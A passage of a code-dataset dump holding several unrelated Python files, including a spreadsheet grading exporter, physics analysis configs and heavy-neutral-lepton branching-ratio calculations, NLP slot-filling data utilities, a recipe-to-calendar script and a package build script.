export_df_to_gradeing_sheet(df, writer, sheet_name = \"unnamed\", name_excel = \"unnamed grading\"):\n\n    #writer = pd.ExcelWriter(name_excel, engine='xlsxwriter')\n    #dfr = df.copy()\n    df.to_excel(writer, sheet_name = sheet_name, index = False, startrow = 1)\n\n    #create book and sheet\n    workbook = writer.book\n    worksheet = writer.sheets[sheet_name] # pull worksheet \n    \n    #hide columns without characteristics atm\n    \n    worksheet.set_column('G:J', None, None, {'hidden': True})\n\n    rows = len(df.index)\n    #formats\n    #column width\n    format_center = workbook.add_format({'align': 'center', 'valign': 'top'})\n    #set width and alignment of all the columns\n\n    worksheet.set_column(0, 1, 30, format_center)\n    worksheet.set_column(2, 3, 13, format_center)\n    worksheet.set_column(4, 4, 20, format_center)\n    worksheet.set_column(5, 5, 10, format_center)\n    worksheet.set_column(10, 15, 25, format_center)\n    \n    #set title color\n    \n    treatment_header = workbook.add_format({'align': 'center', 'valign': 'top'})\n    treatment_header.set_bg_color('#d9e2f3')\n    \n    if sheet_name != \"Notes\":\n        \n        for i in range(0, len(df.index)):\n            \n            if type(df.loc[i, \"Treatment 1\"]) == str:\n                \n                worksheet.set_row(i + 2, 15, treatment_header)\n\n    #conditional format\n    RoB_low_risk = workbook.add_format()\n    RoB_low_risk.set_bg_color('#70ad47')\n\n    RoB_prob_low_risk = workbook.add_format()\n    RoB_prob_low_risk.set_bg_color('yellow')\n\n    RoB_prob_high_risk = workbook.add_format()\n    RoB_prob_high_risk.set_bg_color('#ed7d31')\n\n    RoB_high_risk = workbook.add_format()\n    
RoB_high_risk.set_bg_color('red')\n \n format3 = workbook.add_format()\n\n worksheet.conditional_format(2, 10, rows + 2, 15, {'type': 'blanks',\n 'stop_if_true': True,\n 'format': format3})\n \n worksheet.conditional_format(2, 10, rows + 2, 15, {'type': 'text',\n 'criteria': 'begins with',\n 'value': 'low risk of bias',\n 'format': RoB_low_risk})\n worksheet.conditional_format(2, 10, rows + 2, 15, {'type': 'text',\n 'criteria': 'begins with',\n 'value': 'probably low risk of bias',\n 'format': RoB_prob_low_risk})\n worksheet.conditional_format(2, 10, rows + 2, 15, {'type': 'text',\n 'criteria': 'begins with',\n 'value': 'probably high risk of bias',\n 'format': RoB_prob_high_risk})\n worksheet.conditional_format(2, 10, rows + 2, 15, {'type': 'text',\n 'criteria': 'begins with',\n 'value': 'either probably low or probably high risk of bias',\n 'format': RoB_prob_high_risk})\n worksheet.conditional_format(2, 10, rows + 2, 15, {'type': 'text',\n 'criteria': 'begins with',\n 'value': 'high risk of bias',\n 'format': RoB_high_risk}) \n worksheet.set_zoom(90)\n\n\"\"\"Functions for the second task\"\"\"","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":38084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"218005563","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 21 14:51:55 2013\n\n@author: cimatori\n\"\"\"\n\n# 1. General\n# Data path\nfrom socket import gethostname\nif gethostname()=='sboron2':\n BaseDir = '/run/media/sambarluc/Cimatoribus1/Analyses/LIS131/'\nelse:\n BaseDir = '/media/scratch/Analyses/LIS131/'\n#Output directory\nOutDir = BaseDir+'TemperatureDissipation/'\n# Data dir\nDetailFile = BaseDir+'ProcessData/results/Output_data_stex.chn'\n\n# Get data from these dates\nStart = 104.\nEnd = 224.\n#Start = 155.0\n#End = 165.0\n\n# Pass band in sec\nBP = 1500\n# Stop band\nBS = 5600\n\n# Which increments to compute?\n#dTs = [2**i for i in range(12)]\nfrom numpy import unique,int32,around,logspace\ndTs = unique(int32(logspace(0,20,40, base=1.5)))\nndTs = len(dTs)\n\n# How many points of cdf do we want to keep?\nnCDF = 1e3\n\n# Step of spatial series of temperature (m)\nStepX = 0.2\n\n# File containing taylor converted data\nTaylorFile = 'results/Taylor_StepX_{}_day_{}_{}.hdf'.format(StepX,Start,End)\n\n# Which thermistor sets should be computed?\nsets = ['73-108','109-144']\n#sets = ['1-36','37-72']\n\n# Order of moments to compute\nMoms = range(1,11)\nnM = len(Moms)\n\nsetNames = ('1-36','37-72','73-108','109-144')\nnSets = len(setNames)\nsetLabels = dict(zip(setNames,('A','B','C','D')))\nsetThms = dict(zip(setNames,(range(0,36),range(36,72),range(72,108),range(108,144))))\n\nsetName = ['{}'.format(setLabels[sn]) for sn in sets]\nsetName = ''.join(setName)\n\n# Style of bar plots\nbStyle = dict(ls='-', lw=1.5, alpha=0.9)\n# Style for point plots\npStyle = dict(ms=6, alpha=0.8, mew=1.2, ls='none')\n# Style for fill_between plots\nfStyle = dict(alpha=0.2, lw=1.)\n\n# Markers for tidal phases\nmarkT = ('^','o')\nnamT = ('up', 'down')\ncolorsT = ('b','r')\n\n# Number of tidal phases\nnT = len(namT)\n\n# File where to save results\nOutFile = OutDir+'results/Moments_{}_BS_{}_BP_{}_day_{}_{}.npz' \\\n .format(setName,BS,BP,Start,End)\nOutFileNoF = OutDir+'results/Moments_{}_NoFilter_day_{}_{}.npz' \\\n .format(setName,Start,End)\nOutFileT = OutDir+'results/Moments_{}_Taylor_StepX_{}_day_{}_{}.npz' \\\n 
.format(setName,StepX,Start,End)\n","sub_path":"LIS131/TemperatureDissipation/ConfigMoments.py","file_name":"ConfigMoments.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"652443949","text":"class Bullet(object):\n def __init__(self, x, y, direction):\n self.x = x\n self.y = y\n self.direction = direction\n\n self.speed = 5\n self._size = 5\n\n self.removed = False\n\n def copy(self):\n b = Bullet(self.x, self.y, self.direction)\n b.speed = self.speed\n b._size = self._size\n b.removed = self.removed\n return b\n\n def update(self):\n self.x += self.speed * cos(radians(self.direction))\n self.y += self.speed * sin(radians(self.direction))\n\n def render(self):\n fill(255, 0, 0)\n ellipse(self.x, self.y, self._size, self._size)\n","sub_path":"Tankgame/bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"600708992","text":"# -*- encoding: utf-8 -*-\n#\n# Copyright 2012 posativ . All rights reserved.\n# License: BSD Style, 2 clauses. see acrylamid/__init__.py\n\nimport os\nimport functools\n\nfrom fnmatch import fnmatch\n\n\n# Borrowed from werkzeug._internal\nclass _Missing(object):\n\n def __repr__(self):\n return 'no value'\n\n def __reduce__(self):\n return '_missing'\n\n\n# Borrowed from werkzeug.utils\nclass cached_property(object):\n \"\"\"A decorator that converts a function into a lazy property. The\n function wrapped is called the first time to retrieve the result\n and then that calculated result is used the next time you access\n the value::\n\n class Foo(object):\n\n @cached_property\n def foo(self):\n # calculate something important here\n return 42\n\n The class has to have a `__dict__` in order for this property to\n work.\n \"\"\"\n\n # implementation detail: this property is implemented as non-data\n # descriptor. non-data descriptors are only invoked if there is\n # no entry with the same name in the instance's __dict__.\n # this allows us to completely get rid of the access function call\n # overhead. If one choses to invoke __get__ by hand the property\n # will still work as expected because the lookup logic is replicated\n # in __get__ for manual invocation.\n\n def __init__(self, func, name=None, doc=None):\n self.__name__ = name or func.__name__\n self.__module__ = func.__module__\n self.__doc__ = doc or func.__doc__\n self.func = func\n self._missing = _Missing()\n\n def __get__(self, obj, type=None):\n if obj is None:\n return self\n value = obj.__dict__.get(self.__name__, self._missing)\n if value is self._missing:\n value = self.func(obj)\n obj.__dict__[self.__name__] = value\n return value\n\n\nclass memoized(object):\n \"\"\"Decorator. 
Caches a function's return value each time it is called.\n If called later with the same arguments, the cached value is returned\n (not reevaluated).\n \"\"\"\n def __init__(self, func):\n self.func = func\n self.cache = {}\n def __call__(self, *args):\n try:\n return self.cache[args]\n except KeyError:\n value = self.func(*args)\n self.cache[args] = value\n return value\n except TypeError:\n # uncachable -- for instance, passing a list as an argument.\n # Better to not cache than to blow up entirely.\n return self.func(*args)\n def __repr__(self):\n \"\"\"Return the function's docstring.\"\"\"\n return self.func.__doc__\n def __get__(self, obj, objtype):\n \"\"\"Support instance methods.\"\"\"\n return functools.partial(self.__call__, obj)\n\n\ndef filelist(content_dir, entries_ignore=[]):\n \"\"\"Gathering all entries in content_dir except entries_ignore via fnmatch.\"\"\"\n\n flist = []\n for root, dirs, files in os.walk(content_dir):\n for f in files:\n if f[0] == '.':\n continue\n path = os.path.join(root, f)\n fn = filter(lambda p: fnmatch(path, os.path.join(content_dir, p)), entries_ignore)\n if not fn:\n flist.append(path)\n return flist\n","sub_path":"acrylamid/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"242956477","text":"#!/usr/bin/env python3\n\nfrom datetime import datetime, timedelta\nfrom glob import glob\nfrom ics import Calendar, Event\nimport yaml\n\nrecipe_list = glob('recipes/*')\nfor idx, cur_file in enumerate(recipe_list):\n print('{}: {}'.format(idx, cur_file))\nprint('-' * 60)\nrecipe_path = recipe_list[int(input('Bitte Rezept auswählen:\\n'))]\nprint('#' * 60)\n\n# parse config\nwith open(recipe_path, 'r') as f:\n recipe = yaml.load(f)\nprint(recipe['name'])\nprint(recipe['url'])\n\n# read cooking steps and calculate times\nsteps = recipe['steps']\nhours = [float(steps[cur_step]['Zwischenzeit']) for cur_step in steps.keys()]\n\nwhile True:\n # user input\n szTime = input('Zeitpunkt für das fertige Brot [DD.MM. HH]:\\n')\n end_time = datetime.strptime(szTime, '%d.%m. %H').replace(year=datetime.now().year)\n print('-' * 60)\n\n # generate calendar object\n c = Calendar()\n\n # loop over every event\n for idx, cur_step in enumerate(steps.keys()):\n # get date\n date = end_time - timedelta(hours=sum(hours[idx:]))\n print('\\t{} Uhr\\t{}'.format(date.strftime('%d.%m. %H:%M'), cur_step))\n\n # save it as an event\n e = Event()\n e.name = cur_step\n e.begin = date\n e.duration = ({'minutes': 15})\n\n # write description\n e.description = ''\n if steps[cur_step]['Zutaten']:\n e.description += 'Zutaten:\\n'\n for tmp in steps[cur_step]['Zutaten']:\n e.description += tmp + '\\n'\n e.description += '\\n'\n e.description += 'Zubereitung:\\n'\n e.description += steps[cur_step]['Zubereitung'] + '\\n'\n e.description += '\\n'\n e.description += recipe['url']\n\n # save event in calendar\n c.events.append(e)\n\n # save dates?!\n if input('Daten abspeichern? 
[j/[n]] ') == 'j':\n break\n\n# write ics file\nwith open('Backdaten.ics', 'w') as f:\n f.writelines(c)\n","sub_path":"bread2ics.py","file_name":"bread2ics.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"220772385","text":"\nimport os, sys\nimport numpy as np\nimport six\nimport json\nimport random\nfrom collections import defaultdict\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.autograd import Variable\n\ndef convert_to_new_length(tokens, tags, tokenizer):\n n = []\n n_tags = []\n spans = []\n for index, (token, tag) in enumerate(zip(tokens, tags)):\n spans.append([len(n), len(n)])\n for subtoken in tokenizer.tokenize(token):\n spans[-1][1] += 1\n n.append(subtoken)\n n_tags.append(tag)\n tag = 'O' if tag == 'O' else 'I'+tag[1:]\n return n, n_tags, spans\n\ndef convert_to_original_length(sentence, tags, tokenizer):\n r = []\n r_tags = []\n for index, token in enumerate(tokenizer.tokenize(sentence)):\n if token.startswith(\"##\"):\n if r:\n r[-1] = f\"{r[-1]}{token[2:]}\"\n else:\n r.append(token)\n r_tags.append(tags[index])\n return r, r_tags\n\ndef count_tag_nums(json_list, count_tags={'B', 'I'}):\n count = defaultdict(int)\n for item in json_list:\n for tag in item['slot_tags']:\n if tag[0] in count_tags:\n count[tag[:]] += 1\n return count\n\ndef sample_k_shot_slot_filling(k, json_list, count_tags={'B', 'I'}, seed=None):\n '''\n k-shot\n domain D\n label set LD\n '''\n if seed:\n random.seed(seed)\n\n D = {tuple(item['tokens']):item for item in json_list}\n D_keys = set(D)\n D_label_keys = defaultdict(set)\n key_labels = {}\n LD = set()\n for item in json_list:\n key = tuple(item['tokens'])\n labels = [tag[:] for tag in item['slot_tags'] if tag[0] in count_tags]\n key_labels[key] = labels\n LD.update(labels)\n for label in set(labels):\n D_label_keys[label].add(key)\n \n S_keys = set()\n count = {l: 0 for l in LD}\n \n all_count = count_tag_nums(json_list, count_tags=count_tags)\n for l in count:\n n = all_count.get(l, 0)\n if n < k:\n count[l] += k-n\n \n # sample\n for l in sorted(list(LD)):\n while count[l] < k:\n tmp = sorted(list(D_label_keys[l] - S_keys))\n if len(tmp) == 0:\n break\n key = random.choice(tmp)\n S_keys.add(key)\n for lj in key_labels[key]:\n count[lj] += 1\n \n # remove\n for key in sorted(list(S_keys)):\n S_keys.remove(key)\n for lj in key_labels[key]:\n count[lj] -= 1\n if any(v 0:\n not_recall = label_set - correct_set\n not_precise = pred_set - correct_set\n if not_recall or not_precise:\n print('===')\n for category, span_i, span_j in not_recall:\n print(' '.join(i_sent[span_i:span_j]), category)\n print('--')\n for category, span_i, span_j in not_precise:\n print(' '.join(i_sent[span_i:span_j]), category)\n print('===')\n \n if verbose > 0:\n print(n_correct, n_precision, n_recall)\n \n \n try:\n recall = n_correct / n_recall\n precision = n_correct / n_precision\n f1 = 2 / (1/recall + 1/precision)\n except:\n recall = precision = f1 = 0\n \n return {\n 'precision': precision,\n 'recall': recall,\n 'f1': f1,\n 'confusion_dict': confusion_dict,\n }\n\ndef get_cls_metrics(sents, labels, preds, verbose=0):\n n_correct = n_total = 0\n confusion_dict = defaultdict(lambda: [0, 0, 0]) # n_correct, n_preds, n_labels\n for i in range((len(sents))):\n i_label = labels[i]\n i_pred = preds[i]\n i_sent = sents[i]\n \n n_total += 1\n confusion_dict[i_label][2] += 1\n confusion_dict[i_pred][1] += 1\n \n 
if i_label == i_pred:\n n_correct += 1\n confusion_dict[i_pred][0] += 1\n \n try:\n acc = n_correct / n_total\n except:\n acc = 0\n \n return {\n 'acc': acc,\n 'confusion_dict': confusion_dict,\n }\n \n \ndef ALL2BIO(tags):\n ret = []\n for tag in tags:\n if tag[0] == 'S':\n ret.append('B'+tag[1:])\n elif tag[0] == 'E':\n ret.append('I'+tag[1:])\n else:\n ret.append(tag)\n return ret\n\ndef BIO2BIOE(tags):\n ret = []\n for i in range(len(tags)):\n if tags[i][0] == 'I' and (i+1==len(tags) or tags[i+1]!=tags[i]):\n ret.append('E'+tags[i][1:])\n else:\n ret.append(tags[i])\n return ret\n\ndef BIO2BIOES(tags):\n ret = []\n for i in range(len(tags)):\n if tags[i][0] == 'I' and (i+1==len(tags) or tags[i+1]!=tags[i]):\n ret.append('E'+tags[i][1:])\n elif tags[i][0] == 'B' and (i+1==len(tags) or tags[i+1][0]!='I'):\n ret.append('S'+tags[i][1:])\n else:\n ret.append(tags[i])\n return ret\n\ndef strip_accents(string):\n return tokenizer.basic_tokenizer._run_strip_accents(string)\n\n\ndef tokenize_with_span(string):\n '''\n depends on tokenize\n '''\n tokens = tokenize(string)\n token_spans = []\n\n i_token = 0\n i_string = 0\n while len(token_spans) < len(tokens):\n # fix -1 at the end\n if tokens[i_token] == '[UNK]':\n token_spans.append((i_string, -1))\n i_string += 1\n i_token += 1\n continue\n \n # strip '##' to adapt BertTokenizer\n if not tokens[i_token].strip('##').startswith(string[i_string]):\n i_string += 1\n continue\n\n token_spans.append((i_string, i_string + len(tokens[i_token].strip('##'))))\n i_string += len(tokens[i_token].strip('##'))\n i_token += 1\n \n # fix -1 caused by [UNK]\n for i, span in enumerate(token_spans):\n if span[1] == -1:\n if i == len(token_spans)-1:\n token_spans[i] = (token_spans[i][0], len(string))\n else:\n token_spans[i] = (token_spans[i][0], token_spans[i+1][0])\n\n return tokens, token_spans\n\ndef get_span_dict(X):\n '''\n in: [0, 0, 0, 1, 1, 1, 0, 0, 0]\n out: {\n 0: [(0, 3), (6, 9)],\n 1: [(3, 6)],\n }\n '''\n span_dict = defaultdict(list)\n current = None\n for i, x in enumerate(X):\n if current == x:\n span_dict[x][-1][1] = i+1\n elif current != x:\n current = x\n span_dict[x].append([i, i+1])\n\n return span_dict\n\ndef tags_to_ent_tags(tags, N, M=2):\n onehot_tags = to_one_hot(tags, N)\n onehot_tags2 = onehot_tags[:, :, 1:].view(*tags.shape, (N-1)//M, M)\n onehot_tags3 = torch.cat([torch.zeros([*onehot_tags2.shape[:-1], 1])+0.1, onehot_tags2], dim=-1)\n ent_tags = onehot_tags3.argmax(-1)\n return ent_tags\n\ndef tag2span(tags, return_types=False, arbitrary_tag=True):\n '''\n IOBE\n '''\n if arbitrary_tag:\n tags = ALL2BIO(tags)\n tags = BIO2BIOE(tags)\n spans = []\n types = []\n _span = _type = None\n for i, t in enumerate(tags):\n if (t[0] == 'B' or t == 'O') and _span is not None:\n spans.append(_span)\n types.append(_type)\n _span = _type = None\n if t[0] == 'B':\n _span = [i, i+1]\n _type = t[2:]\n if t[0] == 'I':\n if _span is not None:\n _span[1] = i+1\n if t[0] == 'E':\n if _span is not None:\n _span[1] = i+1\n if _span is not None:\n spans.append(_span)\n types.append(_type)\n \n if return_types:\n return spans, types\n return spans\n\ndef combine_tags_list(tags_list):\n tags = []\n for i in range(len(tags_list[0])):\n for tag in [_tags[i] for _tags in tags_list]:\n if tag != 'O':\n tags.append(tag)\n break\n else:\n tags.append('O')\n return tags\n\ndef pad_sequences(sequences, maxlen=None, dtype='int32',\n padding='post', truncating='post', value=0.):\n\n num_samples = len(sequences)\n\n lengths = []\n for x in sequences:\n try:\n 
lengths.append(len(x))\n except TypeError:\n raise ValueError('`sequences` must be a list of iterables. '\n 'Found non-iterable: ' + str(x))\n\n if maxlen is None:\n maxlen = np.max(lengths)\n\n # take the sample shape from the first non empty sequence\n # checking for consistency in the main loop below.\n sample_shape = tuple()\n for s in sequences:\n if len(s) > 0:\n sample_shape = np.asarray(s).shape[1:]\n break\n\n is_dtype_str = np.issubdtype(dtype, np.str_) or np.issubdtype(dtype, np.unicode_)\n if isinstance(value, six.string_types) and dtype != object and not is_dtype_str:\n raise ValueError(\"`dtype` {} is not compatible with `value`'s type: {}\\n\"\n \"You should set `dtype=object` for variable length strings.\"\n .format(dtype, type(value)))\n\n x = np.full((num_samples, maxlen) + sample_shape, value, dtype=dtype)\n for idx, s in enumerate(sequences):\n if not len(s):\n continue # empty list/array was found\n if truncating == 'pre':\n trunc = s[-maxlen:]\n elif truncating == 'post':\n trunc = s[:maxlen]\n else:\n raise ValueError('Truncating type \"%s\" '\n 'not understood' % truncating)\n\n # check `trunc` has expected shape\n trunc = np.asarray(trunc, dtype=dtype)\n if trunc.shape[1:] != sample_shape:\n raise ValueError('Shape of sample %s of sequence at position %s '\n 'is different from expected shape %s' %\n (trunc.shape[1:], idx, sample_shape))\n\n if padding == 'post':\n x[idx, :len(trunc)] = trunc\n elif padding == 'pre':\n x[idx, -len(trunc):] = trunc\n else:\n raise ValueError('Padding type \"%s\" not understood' % padding)\n return x","sub_path":"utils/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":11323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"318721665","text":"from django.conf import settings\nfrom django.template.loader import render_to_string\nimport os\n\n\ntemplate_list = []\nfor template_dir in settings.TEMPLATES[0]['DIRS']:\n for dir, dirnames, filenames in os.walk(template_dir):\n for filename in filenames:\n template = os.path.join(dir, filename).replace(template_dir, '')\n template_list.append(template.lstrip('/'))\n\n\ndef test_templates_render_successfully():\n default_context = {'user': None}\n assert template_list\n for template in template_list:\n render_to_string(template, default_context)\n","sub_path":"sso/user/tests/test_templates.py","file_name":"test_templates.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"530622452","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# Licensed under the GNU General Public License, version 2.\n# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.\n\nfrom pisi.actionsapi import shelltools\nfrom pisi.actionsapi import pisitools\nfrom pisi.actionsapi import get\n\nWorkDir = \"ts2_client_rc2_2032/setup.data/image\"\n\nteamspeak_dir = \"/usr/share/teamspeak\"\n\ndef setup():\n pisitools.dosed(\"TeamSpeak\", \"%installdir%\", teamspeak_dir)\n\ndef install():\n pisitools.dobin(\"TeamSpeak\")\n pisitools.rename(\"/usr/bin/TeamSpeak\", \"teamspeak-client\")\n\n for _exe in [\"TeamSpeak.bin\", \"libborqt-6.9-qt2.3.so\", \"libHVDI.so.0.8.0\", \"libspeex.so.1.0.0\"]:\n pisitools.doexe(_exe, teamspeak_dir)\n\n for _exe in [\"client_sdk/tsControl\", \"client_sdk/libTSRemote.so.0.4\"]:\n pisitools.doexe(_exe, \"%s/client_sdk\" % teamspeak_dir)\n\n for files in [\"client_sdk/tsControl.dpr\", 
\"client_sdk/TsRemoteImport.pas\"]:\n pisitools.insinto(\"%s/client_sdk\" % teamspeak_dir, files)\n\n pisitools.insinto(\"%s/sounds\" % teamspeak_dir, \"sounds/*\")\n\n pisitools.insinto(\"/usr/share/doc/%s/html/manual\" % get.srcTAG(), \"manual/*\")\n pisitools.dosym(\"/usr/share/doc/%s/html/manual\" % get.srcTAG(), \"%s/manual\" % teamspeak_dir)\n\n pisitools.dodoc(\"*.txt\", \"client_sdk/*.txt\")\n","sub_path":"2009/devel/network/voip/teamspeak-client/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"171824903","text":"from __future__ import division\nfrom scipy.integrate import quad\nfrom array import array\nfrom options import *\n\ndef phsp2bodyTauToN(pp):\n # Assuming the hadron is a pion\n MN = pp.MN\n MTau = pp.masses[pp.name2particle['tau']]\n MPi = pp.masses[pp.name2particle['pi']]\n if MN*(MN+2.*MPi) > (MTau**2. - MPi**2.):\n return 0.\n p1 = ( (1. - MN**2./MTau**2.)**2. - (MPi**2./MTau**2.)*(1. + MN**2./MTau**2.) )\n p2 = ( 1. - ( (MPi-MN)**2./MTau**2. ) )\n p3 = ( 1. - ( (MPi+MN)**2./MTau**2. ) )\n p4 = math.sqrt(p2*p3)\n return p1*p3\n\ndef phsp3bodyTauToN(EN, pp, lepton):\n MN = pp.MN\n if ENMTau-ML:\n return 0.\n #if EN > MTau/2.:\n # return 0.\n p1 = ( 1. - ML**2./(MTau**2.+MN**2.-2.*EN*MTau) )**2.\n p2 = math.sqrt(EN**2. - MN**2.)\n p3 = (MTau-EN) * (1.- (MN**2.+ML**2.)/MTau**2.)\n p4 = ( 1.- ML**2./(MTau**2.+MN**2.-2.*EN*MTau) ) * ( (MTau-EN)**2./MTau + (EN**2.-MN**2.)/(3.*MTau) )\n #print EN, p1, p2, (p3-p4), p3, p4\n return math.fabs(p1*p2*(p3-p4))\n\ndef EMax3body(pp, lepton):\n MTau = pp.masses[pp.name2particle['tau']]\n ML = pp.masses[pp.name2particle[lepton]]\n MN = pp.MN\n PNMax = (0.5/MTau) * math.sqrt( (MTau**2. - (ML+MN)**2.) * (MTau**2. - (ML-MN)**2.) )\n ENMax = math.sqrt( MN**2. + PNMax**2. )\n return ENMax\n\n\n\ndef integrate3bodyTauToN(pp, lepton):\n EMin = pp.MN\n #EMax = pp.masses[pp.name2particle['tau']] - pp.masses[pp.name2particle[lepton]]\n #EMax = math.sqrt(((EMax**2-pp.MN**2)/2.)**2+pp.MN**2)\n\n #EMax = pp.masses[pp.name2particle['tau']] * 0.5\n EMax = EMax3body(pp,lepton)\n if EMin >= EMax:\n return 0.\n #print EMin, EMax\n integral = quad(phsp3bodyTauToN,\n EMin, EMax,\n args=(pp, lepton),\n full_output=True)\n #print integral\n return integral[0]\n\ndef brTauToPiN(pp):\n # Assuming the hadron is a pion\n if pp.MN >= (pp.masses[pp.name2particle['tau']] - pp.masses[pp.name2particle['pi']]):\n return 0.\n const = (pp.tauTau/pp.hGeV) * pp.U2[2] * pp.GF**2. * pp.CKM.Vud**2. * pp.fpi**2. * pp.masses[pp.name2particle['tau']]**3. * (1./(16.*math.pi))\n ps = phsp2bodyTauToN(pp)\n return const*ps*2. #majorana\n\ndef brTauToNuEllN(pp, lepton):\n if pp.MN >= (pp.masses[pp.name2particle['tau']] - pp.masses[pp.name2particle[lepton]]):\n return 0.\n const = (pp.tauTau/pp.hGeV) * pp.U2[2] * pp.GF**2. * pp.masses[pp.name2particle['tau']]**2. * (1./(4.*math.pi**3.))\n ps = integrate3bodyTauToN(pp, lepton)\n return const*ps*2. 
#majorana\n\n\n\ncSaver = []\n\n\nif __name__ == '__main__':\n pp = physicsParameters()\n pp.setNCoupling([0.02e-8,0.25e-8,1.e-8])\n #m = np.linspace(0,pp.masses[pp.name2particle['tau']]-pp.masses[pp.name2particle['e']],100).tolist()\n m = np.logspace(-3., math.log10(pp.masses[pp.name2particle['tau']]-pp.masses[pp.name2particle['e']]), 100).tolist()\n bre3, brmu3, brpi2, sumFromTau, brFromMu, brFromE = [], [], [], [], [], []\n #m.remove(m[0])\n m.remove(m[-1])\n for mass in m:\n pp.setNMass(mass)\n pp.setNCoupling([0.02e-8,0.25e-8,1.e-8])\n adj = (pp.nDs/pp.nTotCharm)*0.0543 #br(Ds->taunu)\n bre3.append(brTauToNuEllN(pp,'e')*adj)\n brmu3.append(brTauToNuEllN(pp,'mu')*adj)\n brpi2.append(brTauToPiN(pp)*adj)\n sumFromTau.append(adj*(brTauToPiN(pp)+brTauToNuEllN(pp,'e')+brTauToNuEllN(pp,'mu')))\n pp.setNCoupling([(0.25*0.25)*1.e-8,1.e-8,0.25e-8])\n pp.computeProductionWeights('mu')\n adj = (pp.nDs + (pp.nD+pp.nD0)*pp.w3body['mu']) / pp.nTotCharm\n brFromMu.append(pp.computeNProdBR(1)*adj)\n pp.setNCoupling([1.e-8,0.02e-8,0.02e-8])\n pp.computeProductionWeights('e')\n adj = (pp.nDs + (pp.nD+pp.nD0)*pp.w3body['e']) / pp.nTotCharm\n brFromE.append(pp.computeNProdBR(0)*adj)\n gre3 = r.TGraph(len(m), array('f',m), array('f',bre3))\n grmu3 = r.TGraph(len(m), array('f',m), array('f',brmu3))\n grpi2 = r.TGraph(len(m), array('f',m), array('f',brpi2))\n gre = r.TGraph(len(m), array('f',m), array('f',brFromE))\n grmu = r.TGraph(len(m), array('f',m), array('f',brFromMu))\n grtau = r.TGraph(len(m), array('f',m), array('f',sumFromTau))\n grtau.SetLineColor(r.kPink-9)\n grtau.SetMarkerColor(r.kPink-9)\n gre3.SetLineColor(r.kRed)\n grmu3.SetLineColor(r.kBlue)\n gre.SetLineColor(r.kMagenta+3)\n grmu.SetLineColor(r.kMagenta+3)\n gre.SetLineWidth(2)\n grmu.SetLineWidth(2)\n grtau.SetLineWidth(2)\n gre.SetMarkerColor(r.kMagenta+3)\n grmu.SetMarkerColor(r.kMagenta+3)\n gre.SetLineStyle(2)\n grmu.SetLineStyle(9)\n grpi2.SetLineColor(r.kBlack)\n gre3.SetMarkerColor(r.kRed)\n grmu3.SetMarkerColor(r.kBlue)\n grpi2.SetMarkerColor(r.kBlack)\n gre3.SetLineWidth(2)\n grmu3.SetLineWidth(2)\n grpi2.SetLineWidth(2)\n mgr = r.TMultiGraph()\n mgr.SetTitle('HNL production from #tau flavour')\n mgr.Add(gre3)\n mgr.Add(grmu3)\n mgr.Add(grpi2)\n mgr.Add(grtau)\n mgr.Add(gre)\n mgr.Add(grmu)\n c1 = r.TCanvas()\n cSaver.append(c1)\n c1.SetLogy()\n c1.SetLogx()\n c1.SetGrid()\n mgr.Draw('alp')\n mgr.GetXaxis().SetTitle('HNL mass (GeV)')\n mgr.GetXaxis().SetRangeUser(0.01,1.77)\n mgr.GetYaxis().SetTitle('Production BR')\n mgr.GetYaxis().SetRangeUser(1.e-14,1.e-9)\n mgr.GetXaxis().CenterTitle()\n mgr.GetXaxis().SetTitleSize(0.06)\n mgr.GetXaxis().SetTitleOffset(0.79)\n mgr.GetYaxis().CenterTitle()\n mgr.GetYaxis().SetTitleSize(0.06)\n mgr.GetYaxis().SetTitleOffset(0.78)\n leg = r.TLegend(0.33,0.1,0.63,0.38)\n leg.SetFillColor(r.kWhite)\n leg.AddEntry(grpi2,'#tau #rightarrow #pi N','lp')\n leg.AddEntry(gre3,'#tau #rightarrow e #nu_{e} N','lp')\n leg.AddEntry(grmu3,'#tau #rightarrow #mu #nu_{#mu} N','lp')\n leg.AddEntry(grtau,'U_{#tau} production','lp')\n leg.AddEntry(gre,'U_{e} production','lp')\n leg.AddEntry(grmu,'U_{#mu} production','lp')\n leg.SetTextSize(0.048)\n leg.Draw()\n c1.Modified()\n c1.Update()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n#def integrate3bodyTauToN(pp, lepton, nToys=1000):\n# #### Setting up the parameters for generation\n# MN = pp.MN\n# ML = pp.masses[pp.name2particle[lepton]]\n# MTau = pp.masses[pp.name2particle['tau']]\n# pTau = r.TLorentzVector(0., 0., 0., MTau)\n# 
